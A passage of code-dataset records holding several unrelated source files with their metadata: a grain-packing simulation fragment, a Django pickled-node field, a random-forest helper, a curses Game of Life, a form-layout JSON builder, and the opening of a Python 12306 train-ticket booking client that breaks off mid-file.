if nr_tries > 0:
# Optimization: Use coarser grid for packing, then insert packed grains into fine grid
# No need to get the return values, trunc_triangles
ccb_c.populate_voxels(M_coarse, L, trunc_triangles, nr_tries, idelta_coarse, 1.0)
grain_ids, overlaps, voxel_indices = ccb_c.populate_voxels(M, L, trunc_triangles, 1, 0, 1.0)
if mc_steps > 0:
start_time = time.time()
# Do Potts on coarse grid first for an improved initial guess.
M_coarseMC = M//2
grain_ids_coarse, overlaps_coarse, voxel_indices_coarse = ccb_c.populate_voxels(M_coarseMC, L, trunc_triangles, 0, 0, 1.0)
_, gb_voxels_coarse, _ = ccb_c.calc_surface_prop(M_coarseMC, grain_ids_coarse)
ccb_c.make_mcp_bound(M_coarseMC, grain_ids_coarse, gb_voxels_coarse, overlaps_coarse, voxel_indices_coarse,
np.int(mc_steps * M_coarseMC**4), tau)
# Copy over that solution to the overlap regions of the fine grid as a starting point
M2 = M**2
i = np.nonzero(overlaps)[0]
iz = i // M2
iy = (i - iz*M2) // M
ix = i - iz*M2 - iy*M
cix = ix * M_coarseMC // M
ciy = iy * M_coarseMC // M
ciz = iz * M_coarseMC // M
ci = cix + ciy*M_coarseMC + ciz*M_coarseMC**2
gid = grain_ids_coarse[ci]
# Could use a Cython implementation for efficiency.
for ii, g in zip(i, gid):
if g != grain_ids[ii] and np.searchsorted(voxel_indices[g-2], ii) < len(voxel_indices[g-2]):
grain_ids[ii] = g
# This might change a few voxels to a value that they shouldn't obtain, but it's barely noticeable
# grain_ids_1[i] = grain_ids_coarse[ci]
_, gb_voxels, _ = ccb_c.calc_surface_prop(M, grain_ids)
# and run the full resolution MCP:
ccb_c.make_mcp_bound(M, grain_ids, gb_voxels, overlaps, voxel_indices, np.int(mc_steps * M ** 4), tau)
print('Potts model took {} seconds'.format(np.str(time.time() - start_time)))
if options.stray_cleanup:
start_time = time.time()
ccb_c.stray_cleanup(M, grain_ids)
print('Stray voxel cleanup took {} seconds'.format(np.str(time.time() - start_time)))
surface_voxels, gb_voxels, interface_voxels = ccb_c.calc_surface_prop(M, grain_ids)
phases, good_voxels, euler_angles = ccb_c.calc_grain_prop(M, grain_ids, trunc_triangles)
phase_volumes = np.bincount(phases)
vol_frac_WC = phase_volumes[2] / np.float(M ** 3)
vol_frac_Co = 1 - vol_frac_WC
mass_frac_WC = ccb.mass_fraction(vol_frac_WC)
sum_gb_voxels = np.sum(gb_voxels)
contiguity = sum_gb_voxels / np.float(sum_gb_voxels + np.sum(interface_voxels))
print('Contiguity {:5f}, Co volume frac {:.5f}, mass frac {:.5f}'.format(
contiguity, 1 - vol_frac_WC, ccb.mass_fraction(vol_frac_WC)))
ccb.write_dream3d(fname, 3 * [M], 3 * [delta_x], trunc_triangles, grain_ids, phases, good_voxels,
euler_angles, surface_voxels, gb_voxels, interface_voxels, overlaps)
with open(fname + '_trunc_triangles.data', 'wb') as f:
pickle.dump([t.rot_matrix for t in trunc_triangles], f)
# Saving grain volume data
if False:
grain_volumes = np.bincount(grain_ids)
d_eq = ccb.volume_to_eq_d(grain_volumes[2:] * delta_x ** 3)
# np.savetxt(fname + '_d_orig.txt', [t.d_eq for t in trunc_triangles])
np.savetxt(fname + '_d.txt', d_eq)
# Plot initial and final distributions
import matplotlib.pyplot as plt
plt.hist(np.array([t.d_eq for t in trunc_triangles]), alpha=0.5, bins=15, normed=True, label='Initial')
plt.hist(d_eq, alpha=0.5, bins=15, normed=True, label='Final')
plt.legend(loc='upper right')
plt.show()
|
gpl-3.0
| -3,357,573,291,557,032,400
| 41.54902
| 126
| 0.65818
| false
| 2.923543
| false
| false
| false
|
lyoniionly/django-cobra
|
src/cobra/models/fields/node.py
|
1
|
3306
|
from __future__ import absolute_import, print_function
import collections
import logging
import six
import warnings
from django.db import models
from django.db.models.signals import post_delete
from cobra.core.cache import memoize
from cobra.core.compat import pickle
from cobra.core.strings import decompress, compress
from .gzippeddict import GzippedDictField
try:
from south.modelsinspector import add_introspection_rules
except ImportError:
pass
else:
add_introspection_rules([], ["^cobra\.models\.fields\.node\.NodeField"])
__all__ = ('NodeField',)
logger = logging.getLogger('cobra.errors')
class NodeData(collections.MutableMapping):
def __init__(self, id, data=None):
self.id = id
self._node_data = data
def __getitem__(self, key):
return self.data[key]
def __setitem__(self, key, value):
self.data[key] = value
def __delitem__(self, key):
del self.data[key]
def __iter__(self):
return iter(self.data)
def __len__(self):
return len(self.data)
def __repr__(self):
cls_name = type(self).__name__
if self._node_data:
return '<%s: id=%s data=%r>' % (
cls_name, self.id, repr(self._node_data))
return '<%s: id=%s>' % (cls_name, self.id,)
@memoize
def data(self):
from cobra import singleton
if self._node_data is not None:
return self._node_data
elif self.id:
warnings.warn('You should populate node data before accessing it.')
return singleton.nodestore.get(self.id) or {}
return {}
def bind_data(self, data):
self._node_data = data
class NodeField(GzippedDictField):
"""
Similar to the gzippedictfield except that it stores a reference
to an external node.
"""
def contribute_to_class(self, cls, name):
super(NodeField, self).contribute_to_class(cls, name)
post_delete.connect(
self.on_delete,
sender=self.model,
weak=False)
def on_delete(self, instance, **kwargs):
from cobra import singleton
value = getattr(instance, self.name)
if not value.id:
return
singleton.nodestore.delete(value.id)
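# Stored column values are compressed pickles: either {'node_id': ...}, a
# reference into the external nodestore, or legacy inline data; to_python
# unpacks whichever form is present and wraps it in NodeData.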
def to_python(self, value):
if isinstance(value, six.string_types) and value:
try:
value = pickle.loads(decompress(value))
except Exception as e:
logger.exception(e)
value = {}
elif not value:
value = {}
if 'node_id' in value:
node_id = value.pop('node_id')
data = None
else:
node_id = None
data = value
return NodeData(node_id, data)
def get_prep_value(self, value):
from cobra import singleton
if not value and self.null:
# save ourselves some storage
return None
# TODO(dcramer): we should probably do this more intelligently
# and manually
if not value.id:
value.id = singleton.nodestore.create(value.data)
else:
singleton.nodestore.set(value.id, value.data)
return compress(pickle.dumps({
'node_id': value.id
}))
|
apache-2.0
| 8,760,018,005,294,236,000
| 24.635659
| 79
| 0.588627
| false
| 3.987937
| false
| false
| false
|
andersgs/dingo
|
dingo/random_forest.py
|
1
|
2551
|
'''
Some functions to fit a random forest
'''
import sklearn.ensemble
import pandas
import progressbar
bar = progressbar.ProgressBar()
def test_max_features(max_features):
if (max_features not in ['sqrt', 'auto', 'log2', None]):
try:
max_features = int(max_features)
except ValueError:
print("max_features has to be an integer or one of 'sqrt', 'auto', 'log2' or None.")
raise
return max_features
def learn(X,y, n_trees = 10, criterion = 'entropy', max_features = "sqrt", max_depth = None, min_samples_split = 2, min_samples_leaf = 1, min_weight_fraction_leaf = 0, max_leaf_nodes = None, min_impurity_split = 1e-7, bootstrap = False, oob_score = False, n_jobs = 10, random_state = None, warm_start = False, class_weight = 'balanced_subsample'):
rf = sklearn.ensemble.RandomForestClassifier(n_estimators = n_trees, \
criterion = criterion, \
max_features = max_features, \
max_depth = max_depth, \
min_samples_split = min_samples_split, \
min_samples_leaf = min_samples_leaf, \
min_weight_fraction_leaf = min_weight_fraction_leaf, \
max_leaf_nodes = max_leaf_nodes, \
min_impurity_split = min_impurity_split, \
bootstrap = bootstrap, \
oob_score = oob_score, \
n_jobs = n_jobs, \
random_state = random_state, \
warm_start = warm_start, \
class_weight = class_weight, \
verbose = 1
)
rf.fit(X, y)
return rf
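# importance() averages feature_importances_ over every tree in the fitted
# forest, pairs each value with its k-mer, and returns only the k-mers with
# non-zero importance, sorted in descending order.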
def importance(rf, kmers):
importance = rf.estimators_[0].feature_importances_
for est in bar(rf.estimators_[1:]):
importance += est.feature_importances_
importance = importance/rf.n_estimators
d = {"kmer": kmers,
"importance": importance}
d = pandas.DataFrame(d)
d = d.sort_values(by = "importance", ascending = 0)
d = d.loc[d.importance > 0]
return d
|
bsd-3-clause
| -2,556,278,225,202,661,400
| 49.019608
| 347
| 0.46374
| false
| 4.555357
| false
| false
| false
|
Orav/kbengine
|
kbe/src/lib/python/Tools/demo/life.py
|
1
|
9249
|
#!/usr/bin/env python3
"""
A curses-based version of Conway's Game of Life.
An empty board will be displayed, and the following commands are available:
E : Erase the board
R : Fill the board randomly
S : Step for a single generation
C : Update continuously until a key is struck
Q : Quit
Cursor keys : Move the cursor around the board
Space or Enter : Toggle the contents of the cursor's position
Contributed by Andrew Kuchling, Mouse support and color by Dafydd Crosby.
"""
import curses
import random
class LifeBoard:
"""Encapsulates a Life board
Attributes:
X,Y : horizontal and vertical size of the board
state : dictionary mapping (x,y) to 0 or 1
Methods:
display(update_board) -- If update_board is true, compute the
next generation. Then display the state
of the board and refresh the screen.
erase() -- clear the entire board
make_random() -- fill the board randomly
set(y,x) -- set the given cell to Live; doesn't refresh the screen
toggle(y,x) -- change the given cell from live to dead, or vice
versa, and refresh the screen display
"""
def __init__(self, scr, char=ord('*')):
"""Create a new LifeBoard instance.
scr -- curses screen object to use for display
char -- character used to render live cells (default: '*')
"""
self.state = {}
self.scr = scr
Y, X = self.scr.getmaxyx()
self.X, self.Y = X - 2, Y - 2 - 1
self.char = char
self.scr.clear()
# Draw a border around the board
border_line = '+' + (self.X * '-') + '+'
self.scr.addstr(0, 0, border_line)
self.scr.addstr(self.Y + 1, 0, border_line)
for y in range(0, self.Y):
self.scr.addstr(1 + y, 0, '|')
self.scr.addstr(1 + y, self.X + 1, '|')
self.scr.refresh()
def set(self, y, x):
"""Set a cell to the live state"""
if x < 0 or self.X <= x or y < 0 or self.Y <= y:
raise ValueError("Coordinates out of range %i,%i" % (y, x))
self.state[x, y] = 1
def toggle(self, y, x):
"""Toggle a cell's state between live and dead"""
if x < 0 or self.X <= x or y < 0 or self.Y <= y:
raise ValueError("Coordinates out of range %i,%i" % (y, x))
if (x, y) in self.state:
del self.state[x, y]
self.scr.addch(y + 1, x + 1, ' ')
else:
self.state[x, y] = 1
if curses.has_colors():
# Let's pick a random color!
self.scr.attrset(curses.color_pair(random.randrange(1, 7)))
self.scr.addch(y + 1, x + 1, self.char)
self.scr.attrset(0)
self.scr.refresh()
def erase(self):
"""Clear the entire board and update the board display"""
self.state = {}
self.display(update_board=False)
def display(self, update_board=True):
"""Display the whole board, optionally computing one generation"""
M, N = self.X, self.Y
if not update_board:
for i in range(0, M):
for j in range(0, N):
if (i, j) in self.state:
self.scr.addch(j + 1, i + 1, self.char)
else:
self.scr.addch(j + 1, i + 1, ' ')
self.scr.refresh()
return
d = {}
self.boring = 1
for i in range(0, M):
L = range(max(0, i - 1), min(M, i + 2))
for j in range(0, N):
s = 0
live = (i, j) in self.state
for k in range(max(0, j - 1), min(N, j + 2)):
for l in L:
if (l, k) in self.state:
s += 1
s -= live
if s == 3:
# Birth
d[i, j] = 1
if curses.has_colors():
# Let's pick a random color!
self.scr.attrset(curses.color_pair(
random.randrange(1, 7)))
self.scr.addch(j + 1, i + 1, self.char)
self.scr.attrset(0)
if not live:
self.boring = 0
elif s == 2 and live:
# Survival
d[i, j] = 1
elif live:
# Death
self.scr.addch(j + 1, i + 1, ' ')
self.boring = 0
self.state = d
self.scr.refresh()
def make_random(self):
"Fill the board with a random pattern"
self.state = {}
for i in range(0, self.X):
for j in range(0, self.Y):
if random.random() > 0.5:
self.set(j, i)
def erase_menu(stdscr, menu_y):
"Clear the space where the menu resides"
stdscr.move(menu_y, 0)
stdscr.clrtoeol()
stdscr.move(menu_y + 1, 0)
stdscr.clrtoeol()
def display_menu(stdscr, menu_y):
"Display the menu of possible keystroke commands"
erase_menu(stdscr, menu_y)
# If color, then light the menu up :-)
if curses.has_colors():
stdscr.attrset(curses.color_pair(1))
stdscr.addstr(menu_y, 4,
'Use the cursor keys to move, and space or Enter to toggle a cell.')
stdscr.addstr(menu_y + 1, 4,
'E)rase the board, R)andom fill, S)tep once or C)ontinuously, Q)uit')
stdscr.attrset(0)
def keyloop(stdscr):
# Clear the screen and display the menu of keys
stdscr.clear()
stdscr_y, stdscr_x = stdscr.getmaxyx()
menu_y = (stdscr_y - 3) - 1
display_menu(stdscr, menu_y)
# If color, then initialize the color pairs
if curses.has_colors():
curses.init_pair(1, curses.COLOR_BLUE, 0)
curses.init_pair(2, curses.COLOR_CYAN, 0)
curses.init_pair(3, curses.COLOR_GREEN, 0)
curses.init_pair(4, curses.COLOR_MAGENTA, 0)
curses.init_pair(5, curses.COLOR_RED, 0)
curses.init_pair(6, curses.COLOR_YELLOW, 0)
curses.init_pair(7, curses.COLOR_WHITE, 0)
# Set up the mask to listen for mouse events
curses.mousemask(curses.BUTTON1_CLICKED)
# Allocate a subwindow for the Life board and create the board object
subwin = stdscr.subwin(stdscr_y - 3, stdscr_x, 0, 0)
board = LifeBoard(subwin, char=ord('*'))
board.display(update_board=False)
# xpos, ypos are the cursor's position
xpos, ypos = board.X // 2, board.Y // 2
# Main loop:
while True:
stdscr.move(1 + ypos, 1 + xpos) # Move the cursor
c = stdscr.getch() # Get a keystroke
if 0 < c < 256:
c = chr(c)
if c in ' \n':
board.toggle(ypos, xpos)
elif c in 'Cc':
erase_menu(stdscr, menu_y)
stdscr.addstr(menu_y, 6, ' Hit any key to stop continuously '
'updating the screen.')
stdscr.refresh()
# Activate nodelay mode; getch() will return -1
# if no keystroke is available, instead of waiting.
stdscr.nodelay(1)
while True:
c = stdscr.getch()
if c != -1:
break
stdscr.addstr(0, 0, '/')
stdscr.refresh()
board.display()
stdscr.addstr(0, 0, '+')
stdscr.refresh()
stdscr.nodelay(0) # Disable nodelay mode
display_menu(stdscr, menu_y)
elif c in 'Ee':
board.erase()
elif c in 'Qq':
break
elif c in 'Rr':
board.make_random()
board.display(update_board=False)
elif c in 'Ss':
board.display()
else:
# Ignore incorrect keys
pass
elif c == curses.KEY_UP and ypos > 0:
ypos -= 1
elif c == curses.KEY_DOWN and ypos + 1 < board.Y:
ypos += 1
elif c == curses.KEY_LEFT and xpos > 0:
xpos -= 1
elif c == curses.KEY_RIGHT and xpos + 1 < board.X:
xpos += 1
elif c == curses.KEY_MOUSE:
mouse_id, mouse_x, mouse_y, mouse_z, button_state = curses.getmouse()
if (mouse_x > 0 and mouse_x < board.X + 1 and
mouse_y > 0 and mouse_y < board.Y + 1):
xpos = mouse_x - 1
ypos = mouse_y - 1
board.toggle(ypos, xpos)
else:
# They've clicked outside the board
curses.flash()
else:
# Ignore incorrect keys
pass
def main(stdscr):
keyloop(stdscr) # Enter the main loop
if __name__ == '__main__':
curses.wrapper(main)
|
lgpl-3.0
| -7,308,566,763,295,885,000
| 33.301527
| 81
| 0.484917
| false
| 3.782822
| false
| false
| false
|
jwilliamn/handwritten
|
extraction/FormatModel/CreatePage3Variable.py
|
1
|
6106
|
import pickle
from extraction.FormatModel.VariableDefinitions import *
from extraction.FormatModel.RawVariableDefinitions import *
import json
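# json.dump cannot serialize Category/Variable instances directly; jsonDefault
# exposes each object's __dict__ and is passed as the 'default=' hook when the
# page description is written out below.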
def jsonDefault(object):
return object.__dict__
if __name__ == '__main__':
Page3 = Category('page3', 'pagina 3')
############
for r in range(1,6):
str_r = str(r)
if len(str_r) == 1:
str_r = '0'+str_r
P = Category('P'+str_r,'Persona '+str_r)
ap_paterno=Category('apellido_paterno','Apellido paterno')
variable_ap_paterno=Variable('pos_TL_BR','posicion final', None)
ap_paterno.addSubType(variable_ap_paterno)
ap_materno = Category('apellido_materno', 'Apellido materno')
variable_ap_materno = Variable('pos_TL_BR', 'posicion final', None)
ap_materno.addSubType(variable_ap_materno)
nombres = Category('nombres', 'nombres')
variable_nombres = Variable('pos_TL_BR', 'posicion final', None)
nombres.addSubType(variable_nombres)
fecha_nacimiento = Category('fecha_nacimiento', 'Fecha de nacimiento')
variable_fecha_nacimiento = Variable('pos_TL_BR', 'posicion final', None)
fecha_nacimiento.addSubType(variable_fecha_nacimiento)
edad_anhos = Category('edad_anhos', 'edad_anios')
variable_edad_anhos = Variable('pos_TL_BR', 'posicion final', None)
edad_anhos.addSubType(variable_edad_anhos)
edad_meses = Category('edad_meses', 'edad_meses')
variable_edad_meses = Variable('pos_TL_BR', 'posicion final', None)
edad_meses.addSubType(variable_edad_meses)
tipo_documento = Category('tipo_documento', 'tipo_documento')
variable_tipo_documento = Variable('pos_TL_BR', 'posicion final', None)
tipo_documento.addSubType(variable_tipo_documento)
numero_documento = Category('numero_documento', 'numero_documento')
variable_numero_documento = Variable('pos_TL_BR', 'posicion final', None)
numero_documento.addSubType(variable_numero_documento)
parentesco_jefe_hogar = Category('parentesco_jefe_hogar', 'parentesco_jefe_hogar')
variable_parentesco_jefe_hogar = Variable('pos_TL_BR', 'posicion final', None)
parentesco_jefe_hogar.addSubType(variable_parentesco_jefe_hogar)
num_nucleo_familiar = Category('num_nucleo_familiar', 'num_nucleo_familiar')
variable_num_nucleo_familiar = Variable('pos_TL_BR', 'posicion final', None)
num_nucleo_familiar.addSubType(variable_num_nucleo_familiar)
sexo = Category('sexo', 'sexo')
variable_sexo = Variable('pos_TL_BR', 'posicion final', None)
sexo.addSubType(variable_sexo)
estado_civil = Category('estado_civil', 'estado_civil')
variable_estado_civil = Variable('pos_TL_BR', 'posicion final', None)
estado_civil.addSubType(variable_estado_civil)
tipo_seguro = Category('tipo_seguro', 'tipo_seguro')
variable_tipo_seguro = Variable('pos_TL_BR', 'posicion final', None)
tipo_seguro.addSubType(variable_tipo_seguro)
lengua_materna = Category('lengua_materna', 'lengua_materna')
variable_lengua_materna = Variable('pos_TL_BR', 'posicion final', None)
lengua_materna.addSubType(variable_lengua_materna)
sabe_leer_escribir = Category('sabe_leer_escribir', 'sabe_leer_escribir')
variable_sabe_leer_escribir = Variable('pos_TL_BR', 'posicion final', None)
sabe_leer_escribir.addSubType(variable_sabe_leer_escribir)
nivel_educativo = Category('nivel_educativo', 'nivel_educativo')
variable_nivel_educativo = Variable('pos_TL_BR', 'posicion final', None)
nivel_educativo.addSubType(variable_nivel_educativo)
ultimo_grado_aprobado = Category('ultimo_grado_aprobado', 'ultimo_grado_aprobado')
variable_ultimo_grado_aprobado = Variable('pos_TL_BR', 'posicion final', None)
ultimo_grado_aprobado.addSubType(variable_ultimo_grado_aprobado)
ultimo_mes_era_un = Category('ultimo_mes_era_un', 'ultimo_mes_era_un')
variable_ultimo_mes_era_un = Variable('pos_TL_BR', 'posicion final', None)
ultimo_mes_era_un.addSubType(variable_ultimo_mes_era_un)
sector_desempenho = Category('sector_desempenho', 'sector_desempenho')
variable_sector_desempenho = Variable('pos_TL_BR', 'posicion final', None)
sector_desempenho.addSubType(variable_sector_desempenho)
presenta_discapacidad = Category('presenta_discapacidad', 'presenta_discapacidad')
variable_presenta_discapacidad = Variable('pos_TL_BR', 'posicion final', None)
presenta_discapacidad.addSubType(variable_presenta_discapacidad)
programa_social_beneficiario = Category('programa_social_beneficiario', 'programa_social_beneficiario')
variable_programa_social_beneficiario = Variable('pos_TL_BR', 'posicion final', None)
programa_social_beneficiario.addSubType(variable_programa_social_beneficiario)
#############
P.addSubType(ap_paterno)
P.addSubType(ap_materno)
P.addSubType(nombres)
P.addSubType(fecha_nacimiento)
P.addSubType(edad_anhos)
P.addSubType(edad_meses)
P.addSubType(tipo_documento)
P.addSubType(numero_documento)
P.addSubType(parentesco_jefe_hogar)
P.addSubType(num_nucleo_familiar)
P.addSubType(sexo)
P.addSubType(estado_civil)
P.addSubType(tipo_seguro)
P.addSubType(lengua_materna)
P.addSubType(sabe_leer_escribir)
P.addSubType(nivel_educativo)
P.addSubType(ultimo_grado_aprobado)
P.addSubType(ultimo_mes_era_un)
P.addSubType(sector_desempenho)
P.addSubType(presenta_discapacidad)
P.addSubType(programa_social_beneficiario)
Page3.addSubType(P)
with open('pagina3.json', 'w') as output:
json.dump(Page3, output, default=jsonDefault, indent=4)
Page3.describe(True)
|
gpl-3.0
| 2,086,762,254,357,249,800
| 44.237037
| 111
| 0.655748
| false
| 2.909004
| false
| false
| false
|
huzhifeng/py12306
|
py12306.py
|
1
|
62739
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Standard library
import argparse
import urllib
import time
import datetime
import sys
import re
import ConfigParser
import random
import smtplib
from email.mime.text import MIMEText
# Third-party libraries
import requests
from huzhifeng import dumpObj, hasKeys
# Set default encoding to utf-8
reload(sys)
sys.setdefaultencoding('utf-8')
requests.packages.urllib3.disable_warnings()
# Global variables
RET_OK = 0
RET_ERR = -1
MAX_TRIES = 3
MAX_DAYS = 60
stations = []
seatMaps = [
('1', u'硬座'), # 硬座/无座
('3', u'硬卧'),
('4', u'软卧'),
('7', u'一等软座'),
('8', u'二等软座'),
('9', u'商务座'),
('M', u'一等座'),
('O', u'二等座'),
('B', u'混编硬座'),
('P', u'特等座')
]
# Global functions
def printDelimiter():
print('-' * 64)
def getTime():
return time.strftime('%Y-%m-%d %X', time.localtime()) # 2014-01-01 12:00:00
def date2UTC(d):
# Convert '2014-01-01' to 'Wed Jan 01 00:00:00 UTC+0800 2014'
t = time.strptime(d, '%Y-%m-%d')
asc = time.asctime(t) # 'Wed Jan 01 00:00:00 2014'
# 'Wed Jan 01 00:00:00 UTC+0800 2014'
return (asc[0:-4] + 'UTC+0800 ' + asc[-4:])
def getCardType(key):
d = {
'1': u'二代身份证',
'2': u'一代身份证',
'C': u'港澳通行证',
'G': u'台湾通行证',
'B': u'护照'
}
return d[key] if key in d else u'未知证件类型'
def getTicketType(key):
d = {
'1': u'成人票',
'2': u'儿童票',
'3': u'学生票',
'4': u'残军票'
}
return d[key] if key in d else u'未知票种'
def getSeatType(key):
d = dict(seatMaps)
return d[key] if key in d else u'未知席别'
def selectSeatType():
key = '1' # default is hard seat
while True:
print(u'请选择席别编码(即左边第一个英文字母):')
for xb in seatMaps:
print(u'%s: %s' % (xb[0], xb[1]))
key = raw_input().upper()
d = dict(seatMaps)
if key in d:
return key
else:
print(u'无效的席别类型!')
def checkDate(date):
m = re.match(r'^\d{4}-\d{2}-\d{2}$', date) # 2014-01-01
if m:
today = datetime.datetime.now()
fmt = '%Y-%m-%d'
today = datetime.datetime.strptime(today.strftime(fmt), fmt)
train_date = datetime.datetime.strptime(m.group(0), fmt)
delta = train_date - today
if delta.days < 0:
print(u'乘车日期%s无效, 只能预订%s以后的车票' % (
train_date.strftime(fmt),
today.strftime(fmt)))
return False
else:
return True
else:
return False
def selectDate():
fmt = '%Y-%m-%d'
week_days = [u'星期一', u'星期二', u'星期三', u'星期四', u'星期五', u'星期六', u'星期天']
now = datetime.datetime.now()
available_date = [(now + datetime.timedelta(days=i)) for i in xrange(MAX_DAYS)]
for i in xrange(0, MAX_DAYS, 2):
print(u'第%2d天: %s(%s)' % (
i + 1, available_date[i].strftime(fmt), week_days[available_date[i].weekday()])),
if i + 1 < MAX_DAYS:
print(u'\t\t第%2d天: %s(%s)' % (
i + 2, available_date[i + 1].strftime(fmt), week_days[available_date[i + 1].weekday()]))
else:
print('')
while True:
print(u'请选择乘车日期(1~%d)' % (MAX_DAYS))
index = raw_input()
if not index.isdigit():
print(u'只能输入数字序号, 请重新选择乘车日期(1~%d)' % (MAX_DAYS))
continue
index = int(index)
if index < 1 or index > MAX_DAYS:
print(u'输入的序号无效, 请重新选择乘车日期(1~%d)' % (MAX_DAYS))
continue
index -= 1
train_date = available_date[index].strftime(fmt)
return train_date
def getStationByName(name):
matched_stations = []
for station in stations:
if (
station['name'] == name
or station['abbr'].find(name.lower()) != -1
or station['pinyin'].find(name.lower()) != -1
or station['pyabbr'].find(name.lower()) != -1):
matched_stations.append(station)
count = len(matched_stations)
if count <= 0:
return None
elif count == 1:
return matched_stations[0]
else:
for i in xrange(0, count):
print(u'%d:\t%s' % (i + 1, matched_stations[i]['name']))
print(u'请选择站点(1~%d)' % (count))
index = raw_input()
if not index.isdigit():
print(u'只能输入数字序号(1~%d)' % (count))
return None
index = int(index)
if index < 1 or index > count:
print(u'输入的序号无效(1~%d)' % (count))
return None
else:
return matched_stations[index - 1]
def inputStation():
while True:
print(u'支持中文, 拼音和拼音缩写(如: 北京,beijing,bj)')
name = raw_input().decode('gb2312', 'ignore')
station = getStationByName(name)
if station:
return station
else:
print(u'站点错误, 没有站点"%s", 请重新输入.' % (name))
def selectTrain(trains):
trains_num = len(trains)
index = 0
while True: # must select a valid train
index = raw_input()
if not index.isdigit():
print(u'只能输入数字序号,请重新选择车次(1~%d)' % (trains_num))
continue
index = int(index)
if index < 1 or index > trains_num:
print(u'输入的序号无效,请重新选择车次(1~%d)' % (trains_num))
continue
if trains[index - 1]['queryLeftNewDTO']['canWebBuy'] != 'Y':
print(u'您选择的车次%s没票啦,请重新选择车次' % (
trains[index - 1]['queryLeftNewDTO']['station_train_code']))
continue
else:
break
return index
class MyOrder(object):
'''docstring for MyOrder'''
def __init__(
self,
username='',
password='',
train_date='',
from_city_name='',
to_city_name=''):
super(MyOrder, self).__init__()
self.username = username # account
self.password = password # password
self.train_date = train_date # travel date [2014-01-01]
today = datetime.datetime.now()
self.back_train_date = today.strftime('%Y-%m-%d') # return date [2014-01-01]
self.tour_flag = 'dc' # one-way 'dc' / round trip 'wf'
self.purpose_code = 'ADULT' # adult ticket
self.from_city_name = from_city_name # content of the 'departure' box on the query page
self.to_city_name = to_city_name # content of the 'destination' box on the query page
self.from_station_telecode = '' # departure station telecode
self.to_station_telecode = '' # destination station telecode
self.passengers = [] # passenger list, at most 5 people
self.normal_passengers = [] # my contacts list
self.trains = [] # train list, refreshed after querying remaining tickets
self.current_train_index = 0 # index of the currently selected train
self.captcha = '' # image captcha
self.orderId = '' # order serial number
self.canWebBuy = False # bookable
self.notify = {
'mail_enable': 0,
'mail_username': '',
'mail_password': '',
'mail_server': '',
'mail_to': [],
'dates': [],
'trains': [],
'xb': [],
'focus': {}
}
def initSession(self):
self.session = requests.Session()
self.session.headers = {
'Accept': 'application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)',
'Referer': 'https://kyfw.12306.cn/otn/index/init',
'Host': 'kyfw.12306.cn',
'Connection': 'Keep-Alive'
}
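# Each kyfw.12306.cn endpoint expects a specific Referer (and, for POSTs,
# Content-Type / XMLHttpRequest) header set; updateHeaders maps the request URL
# to the headers to apply on the shared session before the request is sent.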
def updateHeaders(self, url):
d = {
'https://kyfw.12306.cn/otn/resources/js/framework/station_name.js': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/'
},
'https://kyfw.12306.cn/otn/login/init': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/'
},
'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand&': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/login/init'
},
'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=passenger&rand=randp&': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'
},
'https://kyfw.12306.cn/otn/passcodeNew/checkRandCodeAnsyn': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/login/init',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/login/loginAysnSuggest': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/login/init',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/login/userLogin': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/login/init'
},
'https://kyfw.12306.cn/otn/index/init': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/login/init'
},
'https://kyfw.12306.cn/otn/leftTicket/init': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/index/init',
'Content-Type': 'application/x-www-form-urlencoded'
},
'https://kyfw.12306.cn/otn/leftTicket/log?': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'x-requested-with': 'XMLHttpRequest',
'Cache-Control': 'no-cache',
'If-Modified-Since': '0'
},
'https://kyfw.12306.cn/otn/leftTicket/query?': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'x-requested-with': 'XMLHttpRequest',
'Cache-Control': 'no-cache',
'If-Modified-Since': '0'
},
'https://kyfw.12306.cn/otn/leftTicket/queryT?': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'x-requested-with': 'XMLHttpRequest',
'Cache-Control': 'no-cache',
'If-Modified-Since': '0'
},
'https://kyfw.12306.cn/otn/login/checkUser': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'Cache-Control': 'no-cache',
'If-Modified-Since': '0',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/initDc': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'Content-Type': 'application/x-www-form-urlencoded',
'Cache-Control': 'no-cache'
},
'https://kyfw.12306.cn/otn/confirmPassenger/getPassengerDTOs': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
